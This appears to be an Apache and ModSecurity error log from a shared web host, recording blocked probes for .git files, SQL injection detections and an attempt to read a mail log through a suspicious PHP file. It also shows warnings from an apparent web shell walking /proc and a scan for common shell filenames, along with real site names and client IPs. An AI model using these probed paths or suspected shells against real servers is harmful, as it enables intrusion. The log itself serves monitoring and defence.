[Mon May 11 13:44:36.226735 2026] [security2:error] [pid 1319953:tid 1319968] [client 171.22.133.70:26325] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agHBJOSQ-m-m0ukSShtiSgAAAU0"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 13:44:57.170150 2026] [authz_core:error] [pid 1320674:tid 1320691] [client 52.167.144.218:61138] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/error_log
[Mon May 11 13:44:58.556300 2026] [authz_core:error] [pid 1319953:tid 1319955] [client 172.202.75.66:14953] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2079/wp-config-sample.php
[Mon May 11 13:46:45.679314 2026] [security2:error] [pid 1320674:tid 1320709] [client 34.118.105.78:33648] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agHBpaO9RdIr1DwxYR10OAAAANQ"]
[Mon May 11 13:46:45.680098 2026] [security2:error] [pid 1320674:tid 1320709] [client 34.118.105.78:33648] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agHBpaO9RdIr1DwxYR10OAAAANQ"]
[Mon May 11 13:46:45.680723 2026] [security2:error] [pid 1320674:tid 1320709] [client 34.118.105.78:33648] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agHBpaO9RdIr1DwxYR10OAAAANQ"]
[Mon May 11 13:46:57.116319 2026] [security2:error] [pid 1320398:tid 1320410] [client 86.243.92.156:37386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: ad8a6e2e3e5546da02860ec09cba81b8||1778501813||1778501453"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-hawai/rent-paradise-mobilhome-hawai-exterieur/"] [unique_id "agHBseJEyNRN152ArORq7gAAAEo"], referer: https://rentparadise.fr/accommodation-category/mobile-homes/
[Mon May 11 13:46:57.116615 2026] [security2:error] [pid 1320398:tid 1320410] [client 86.243.92.156:37386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-hawai/rent-paradise-mobilhome-hawai-exterieur/"] [unique_id "agHBseJEyNRN152ArORq7gAAAEo"], referer: https://rentparadise.fr/accommodation-category/mobile-homes/
[Mon May 11 13:46:57.687429 2026] [security2:error] [pid 1320398:tid 1320410] [client 86.243.92.156:37386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agHBseJEyNRN152ArORq7gAAAEo"], referer: https://rentparadise.fr/accommodation-category/mobile-homes/
[Mon May 11 13:47:21.207735 2026] [security2:error] [pid 1319886:tid 1319917] [client 216.73.216.110:24286] ModSecurity: Warning. Matched phrase "var/log/exim_mainlog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/exim_mainlog found within ARGS:filesrc: /var/log/exim_mainlog"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHByay-5-wpj6Sx56Z5bAAAAAw"]
[Mon May 11 13:47:21.208867 2026] [security2:error] [pid 1319886:tid 1319917] [client 216.73.216.110:24286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHByay-5-wpj6Sx56Z5bAAAAAw"]
[Mon May 11 13:47:21.304253 2026] [security2:error] [pid 1319886:tid 1319917] [client 216.73.216.110:24286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHByay-5-wpj6Sx56Z5bAAAAAw"]
[Mon May 11 13:48:08.700818 2026] [security2:error] [pid 1319953:tid 1319973] [client 34.118.187.183:36304] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.git/config"] [unique_id "agHB-OSQ-m-m0ukSShtjrQAAAVI"]
[Mon May 11 13:48:08.701062 2026] [security2:error] [pid 1319953:tid 1319973] [client 34.118.187.183:36304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.git/config"] [unique_id "agHB-OSQ-m-m0ukSShtjrQAAAVI"]
[Mon May 11 13:48:08.701280 2026] [security2:error] [pid 1319953:tid 1319973] [client 34.118.187.183:36304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agHB-OSQ-m-m0ukSShtjrQAAAVI"]
[Mon May 11 13:48:20.061036 2026] [ssl:error] [pid 1320674:tid 1320701] (EAI 2)Name or service not known: [client 205.210.31.60:65176] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 13:48:20.061341 2026] [ssl:error] [pid 1320674:tid 1320701] AH01941: stapling_renew_response: responder error
[Mon May 11 13:48:36.241802 2026] [ssl:error] [pid 1319886:tid 1319936] (EAI 2)Name or service not known: [client 74.7.228.45:33308] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 13:48:36.241849 2026] [ssl:error] [pid 1319886:tid 1319936] AH01941: stapling_renew_response: responder error
[Mon May 11 13:48:44.330688 2026] [security2:error] [pid 1319886:tid 1319926] [client 43.140.247.223:46256] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.fr"] [uri "/"] [unique_id "agHCHKy-5-wpj6Sx56Z53QAAABE"]
[Mon May 11 13:48:44.794442 2026] [security2:error] [pid 1320398:tid 1320400] [client 43.140.247.223:46598] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.com"] [uri "/"] [unique_id "agHCHOJEyNRN152ArORrbwAAAEA"]
[Mon May 11 13:48:50.337291 2026] [security2:error] [pid 1319885:tid 1319910] [client 45.130.203.233:44309] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "webshop.totalcloud.fr"] [uri "/.git/HEAD"] [unique_id "agHCIlchVQ3tCn0m9Oo44wAAAQ0"]
[Mon May 11 13:48:50.337484 2026] [security2:error] [pid 1319885:tid 1319910] [client 45.130.203.233:44309] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "webshop.totalcloud.fr"] [uri "/.git/HEAD"] [unique_id "agHCIlchVQ3tCn0m9Oo44wAAAQ0"]
[Mon May 11 13:48:50.627424 2026] [security2:error] [pid 1319885:tid 1319910] [client 45.130.203.233:44309] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHCIlchVQ3tCn0m9Oo44wAAAQ0"]
PHP Warning:  filesize(): stat failed for /proc/855/task/855/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/855/task/855/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/855/task/855/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/855/task/855/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/855/task/855/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/855/task/855/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/217/task/217/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/217/task/217/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/217/task/217/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/217/task/217/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/217/task/217/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/217/task/217/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 13:50:18.286285 2026] [authz_core:error] [pid 1319953:tid 1319962] [client 216.73.216.110:21503] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/vendor/cocur/slugify/tests/Bridge/Twig/error_log
[Mon May 11 13:51:23.433195 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/file.php
[Mon May 11 13:51:23.591078 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/gettest.php
[Mon May 11 13:51:23.749131 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/gg.php
[Mon May 11 13:51:23.907338 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/goods.php
[Mon May 11 13:51:24.065426 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/maintenance.php
[Mon May 11 13:51:24.223419 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/info.php
[Mon May 11 13:51:24.386927 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/users.php
[Mon May 11 13:51:24.544777 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/install.php
[Mon May 11 13:51:24.702847 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/item.php
[Mon May 11 13:51:24.860678 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/jga.php
[Mon May 11 13:51:25.018623 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/leaf.php
[Mon May 11 13:51:25.176800 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/ms-files.php
[Mon May 11 13:51:25.335062 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/lock.php
[Mon May 11 13:51:25.493190 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/wp-blog-header.php
[Mon May 11 13:51:25.651210 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/lock360.php
[Mon May 11 13:51:25.809299 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/log.php
[Mon May 11 13:51:25.997213 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/manager.php
[Mon May 11 13:51:26.155327 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/meta.php
[Mon May 11 13:51:26.313363 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/mini.php
[Mon May 11 13:51:26.471401 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/mjq.php
[Mon May 11 13:51:26.630597 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/new.php
[Mon May 11 13:51:26.792004 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/onclickfuns.php
[Mon May 11 13:51:26.950233 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/option.php
[Mon May 11 13:51:27.108339 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/plugin-editor.php
[Mon May 11 13:51:27.266328 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/profile.php
[Mon May 11 13:51:27.424384 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/qw_03b4ad31.php
[Mon May 11 13:51:27.582396 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/radio.php
[Mon May 11 13:51:27.741048 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/sf.php
[Mon May 11 13:51:27.899148 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/simple.php
[Mon May 11 13:51:28.057227 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/sql.php
[Mon May 11 13:51:28.215248 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/test.php
[Mon May 11 13:51:28.373003 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/test1.php
[Mon May 11 13:51:28.531185 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/themes.php
[Mon May 11 13:51:28.854282 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/wp-admin.php
[Mon May 11 13:51:29.170202 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/wp-blog-header.php
[Mon May 11 13:51:29.328277 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/wp-config-sample.php
[Mon May 11 13:51:30.119051 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/wp.php
[Mon May 11 13:51:30.435464 2026] [:error] [pid 1320674:tid 1320709] [client 4.193.137.131:3635] File does not exist: /home/kfr/public_html/xmlrpc.php
[Mon May 11 13:51:58.841682 2026] [security2:error] [pid 1319953:tid 1319978] [client 77.246.100.120:65271] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: ee0984748b3724ba0480f6baa7d490e1||1778502118||1778501758"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHC3uSQ-m-m0ukSShtk1AAAAVc"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 13:51:58.842136 2026] [security2:error] [pid 1319953:tid 1319978] [client 77.246.100.120:65271] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHC3uSQ-m-m0ukSShtk1AAAAVc"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 13:51:58.842377 2026] [security2:error] [pid 1319953:tid 1319978] [client 77.246.100.120:65271] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHC3uSQ-m-m0ukSShtk1AAAAVc"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 13:51:58.988340 2026] [security2:error] [pid 1320674:tid 1320707] [client 77.246.100.120:65285] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: ee0984748b3724ba0480f6baa7d490e1||1778502118||1778501758"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHC3qO9RdIr1DwxYR115gAAANI"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 13:51:58.988561 2026] [security2:error] [pid 1320674:tid 1320707] [client 77.246.100.120:65285] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHC3qO9RdIr1DwxYR115gAAANI"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 13:51:58.992109 2026] [security2:error] [pid 1320674:tid 1320707] [client 77.246.100.120:65285] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHC3qO9RdIr1DwxYR115gAAANI"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 13:53:34.332164 2026] [security2:error] [pid 1320398:tid 1320403] [client 43.130.110.130:35868] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ventes-privees-auto.fr"] [uri "/"] [unique_id "agHDPuJEyNRN152ArORszQAAAEM"]
[Mon May 11 13:54:15.473692 2026] [proxy_fcgi:error] [pid 1319953:tid 1319965] (70007)The timeout specified has expired: [client 154.253.19.35:63372] AH01075: Error dispatching request to : (reading input brigade)
[Mon May 11 13:54:27.385780 2026] [:error] [pid 1319953:tid 1319959] [client 38.60.196.214:44584] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 13:54:41.151601 2026] [ssl:error] [pid 1319998:tid 1320021] (EAI 2)Name or service not known: [client 35.92.219.44:18313] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 13:54:41.152213 2026] [ssl:error] [pid 1319998:tid 1320021] AH01941: stapling_renew_response: responder error
[Mon May 11 13:54:41.639087 2026] [ssl:error] [pid 1319953:tid 1319970] (EAI 2)Name or service not known: [client 35.92.219.44:61899] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 13:54:41.639121 2026] [ssl:error] [pid 1319953:tid 1319970] AH01941: stapling_renew_response: responder error
